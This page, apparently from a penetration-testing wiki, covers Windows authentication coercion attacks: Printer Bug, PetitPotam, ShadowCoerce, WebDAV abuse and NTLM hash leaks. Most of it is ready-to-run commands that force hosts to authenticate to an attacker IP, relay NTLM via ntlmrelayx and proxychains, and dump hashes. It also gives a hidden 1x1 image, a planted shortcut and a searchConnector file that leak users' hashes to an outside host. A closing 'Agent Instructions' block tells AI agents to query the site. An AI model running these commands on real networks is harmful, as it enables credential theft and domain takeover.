# Authentication Coercion

* <https://github.com/p0dalirius/windows-coerced-authentication-methods>
* <https://habr.com/ru/post/688682/>

{% hint style="info" %}
It's a good idea to check if **NTLMv1 downgrade** is possible when triggering the callbacks.
{% endhint %}

{% content-ref url="/pages/-MftDqGp10hjGBrtmaEF" %}
[NTLMv1 Downgrade](/pentest/infrastructure/ad/ntlm/ntlmv1-downgrade.md)
{% endcontent-ref %}

## Printer Bug (MS-RPRN)

{% embed url="<https://twitter.com/DebugPrivilege/status/1410158556540719104>" %}

Check if Spooler is running via Remote Registry:

```
$ rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | grep -A2 -e MS-RPRN -e MS-PAR
```

### SpoolSample

* <https://github.com/leechristensen/SpoolSample>
* <https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Spoolsample.ps1>
* <https://github.com/0x00ach/stuff/blob/master/MS-RPRN.exe>
* <https://github.com/BeetleChunks/SpoolSploit>

```
Cmd > .\SpoolSample.exe 192.168.1.11 10.10.13.37
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@80/test.txt
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@SSL/test.txt
```

### dementor.py

* <https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc>

```
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@SSL/test.txt DC01.megacorp.local
```

### printerbug.py

* [https://https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)

```
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@80/test.txt
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@SSL/test.txt
```

## PetitPotam (MS-EFSR)

**CVE-2021-36942**

* <https://github.com/topotam/PetitPotam>
* <https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-Petitpotam.ps1>
* <https://gist.github.com/leechristensen/fda130890fb3c194115e7b856640c30e>
* <https://github.com/ly4k/PetitPotam>

```
$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11 [-pipe all]
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@80/test.txt 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@SSL/test.txt 192.168.1.11
Cmd > .\PetitPotam.exe 10.10.13.37 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@80/test.txt 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@SSL/test.txt 192.168.1.11 1
```

PetitPotam any host (not only a DC with null sessions allowed for the `IPC$` share) without initial creds via proxying through an authenticated session on behalf a DC-relayed machine account:

```
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

$ ntlmrelayx.py -ip 10.10.13.37 -t 192.168.1.11 -smb2support -socks --no-http-server --no-wcf-server --no-raw-server

$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers

$ sudo ./Responder.py -I eth0 -vA 
$ proxychains4 python3 Petitpotam.py -d MEGACORP -u 'DC1$' -no-pass 10.10.13.37 192.168.1.11
```

{% hint style="info" %}
NTLM Relay DC1 to EXCH1 to get SOCKS ➡️ SOCKS proxy PetitPotam to EX1 as `DC1$` ➡️ NTLM Relay to EXCH2 to dump hashes
{% endhint %}

With Kerberos authentication:

```
$ getTGT.py megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip 192.168.1.11
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local
```

### Theory

* <https://www.tiraniddo.dev/2021/08/how-windows-firewall-rpc-filter-works.html>
* <https://www.tiraniddo.dev/2021/08/how-to-secure-windows-rpc-server-and.html>
* <https://itm4n.github.io/fuzzing-windows-rpc-rpcview/>
* <https://itm4n.github.io/from-rpcview-to-petitpotam/>
* <https://clearbluejar.github.io/posts/from-ntobjectmanager-to-petitpotam/>

### Mitigation

* <https://kb.cert.org/vuls/id/405600>
* <https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/>
* <https://github.com/zeronetworks/rpcfirewall>

## ShadowCoerce (MS-FSRVP)

* <https://pentestlaboratories.com/2022/01/11/shadowcoerce/>
* <https://github.com/ShutdownRepo/ShadowCoerce>

```
$ python3 shadowcoerce.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 192.168.1.11
```

## EvilentCoerce (MS-EVEN)

* <https://habr.com/ru/companies/tomhunter/articles/907068/>
* <https://github.com/Thunter-HackTeam/EvilentCoerce>

## WebDAV (WebClient)

* <https://pentestlab.blog/2021/10/20/lateral-movement-webclient/>
* <https://www.tiraniddo.dev/2015/03/starting-webclient-service.html>
* <https://github.com/Hackndo/WebclientServiceScanner>

Check if callback via WebDAV (HTTP) is possible. It **is** when the `WebClient` service is running. If it's possible, then [NTLM Relay to LDAPS](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/kerberos/delegation-abuse/rbcd/README.md#dhcpv6-wpad-ntlm-relay-rbcd) on behalf of the relayed machine account is your chance for [RBCD workstation takeover](https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb).

Check via PowerShell:

```
PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\192.168.1.11\pipe\DAV RPC SERVICE'
```

Check via CME:

```
$ cme smb smb.txt -u snovvcrash -p 'Passw0rd!' -M webdav | grep -a 'WebClient Service enabled'
```

Check via [GetWebDAVStatus](https://github.com/G0ldenGunSec/GetWebDAVStatus):

```
PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1
```

### Enable WebClient

* <https://specterops.io/blog/2025/08/19/will-webclient-start/>

Put the `.searchConnector-ms` file on a writable share. When a domain user opens target folder in explorer, the WebClient service should start automatically:

{% code title="Documents.searchConnector-ms" %}

```
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://whatever/</url>
    </simpleLocation>
</searchConnectorDescription>
```

{% endcode %}

## CVE-2022-30216

* <https://www.akamai.com/blog/security/authentication-coercion-windows-server-service>
* <https://github.com/akamai/akamai-security-research/tree/main/cve-2022-30216>

## NTLM Leak

* <https://github.com/xct/hashgrab>
* <https://github.com/Gl3bGl4z/All_NTLM_leak>
* <https://specterops.io/blog/2025/08/22/operating-outside-the-box-ntlm-relaying-low-privilege-http-auth-to-ldap/>

Leak with PowerShell:

```
PS > IWR -UseDefaultCredentials http://10.10.13.37/index.html
```

Leak [with Python](https://stackoverflow.com/a/35577331):

```python
import win32com.client
URL = 'http://10.10.13.37/index.html'
COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
COM_OBJ.SetAutoLogonPolicy(0)
COM_OBJ.Open('GET', URL, False)
COM_OBJ.Send()
print(COM_OBJ.ResponseText)
```

Leak with rpcping (catch with Responder's DCE-RPC listener):

```
Cmd > rpcping -s 10.10.13.37 -e 135 -a privacy -u NTLM
```

Leak with a hidden image:

```html
<img src="\\10.10.13.37\pwn.ico" height="1" width="1" />
```

Leak with a shortcut:

{% code title="lnk.ps1" %}

```powershell
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\10.10.13.37\pwn.ico"
$lnk.Save()
```

{% endcode %}

Leak with curl:

```
Cmd > curl.exe -i --ntlm -u : http://10.10.13.37/index.html
```

## Tools

### Coercer

* <https://github.com/p0dalirius/Coercer>

```
$ coercer coerce -u snovvcrash -p 'Passw0rd!' -f dc.txt -l 10.10.13.37 [--filter-pipe-name efsrpc] [--filter-method-name EfsRpcDuplicateEncryptionInfoFile] --auth-type smb --always-continue --delay 1
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/authentication-coercion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.